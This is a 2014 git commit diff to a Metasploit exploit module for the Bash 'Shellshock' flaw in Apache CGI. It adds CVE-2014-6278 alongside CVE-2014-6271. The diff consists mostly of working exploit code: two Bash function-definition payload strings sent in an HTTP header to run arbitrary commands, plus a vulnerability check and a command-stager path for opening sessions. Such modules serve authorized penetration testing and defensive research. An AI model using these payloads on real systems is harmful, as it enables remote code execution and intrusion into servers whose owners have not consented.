Add CVE-2014-6278 support, lands rapid7#3932

HD Moore · HD Moore · commit 0380c5e887c9 · 2014-10-01T18:25:41.000-05:00
diff --git a/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb b/modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb
@@ -22,10 +22,12 @@ def initialize(info = {})
       'Author' => [
         'Stephane Chazelas', # Vulnerability discovery
         'wvu', # Original Metasploit aux module
-        'juan vazquez' # Allow wvu's module to get native sessions
+        'juan vazquez', # Allow wvu's module to get native sessions
+        'lcamtuf' # CVE-2014-6278
       ],
       'References' => [
         ['CVE', '2014-6271'],
+        ['CVE', '2014-6278'],
         ['OSVDB', '112004'],
         ['EDB', '34765'],
         ['URL', 'https://access.redhat.com/articles/1200223'],
@@ -64,12 +66,13 @@ def initialize(info = {})
       OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
       OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
       OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
-      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
+      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5]),
+      OptEnum.new('CVE', [true, 'CVE to check/exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278']])
     ], self.class)
   end
 
   def check
-    res = req("echo #{marker}")
+    res = req("echo #{marker}", datastore['CVE'])
 
     if res && res.body.include?(marker * 3)
       return Exploit::CheckCode::Vulnerable
@@ -105,31 +108,42 @@ def exploit
     # A last chance after the cmdstager
     # Trying to make it generic
     unless session_created?
-      req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
+      req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}", datastore['CVE'])
     end
   end
 
   def execute_command(cmd, opts)
     cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
 
-    req(cmd)
+    req(cmd, datastore['CVE'])
   end
 
-  def req(cmd)
+  def req(cmd, cve)
+    case cve
+    when 'CVE-2014-6271'
+      sploit = cve_2014_6271(cmd)
+    when 'CVE-2014-6278'
+      sploit = cve_2014_6278(cmd)
+    end
+
     send_request_cgi(
       {
         'method' => datastore['METHOD'],
         'uri' => normalize_uri(target_uri.path.to_s),
         'headers' => {
-          datastore['HEADER'] => sploit(cmd)
+          datastore['HEADER'] => sploit
         }
       }, datastore['TIMEOUT'])
   end
 
-  def sploit(cmd)
+  def cve_2014_6271(cmd)
     %Q{() { :;};echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"}
   end
 
+  def cve_2014_6278(cmd)
+    %Q{() { _; } >_[$($())] { echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"; }}
+  end
+
   def marker
     @marker ||= rand_text_alphanumeric(rand(42) + 1)
   end
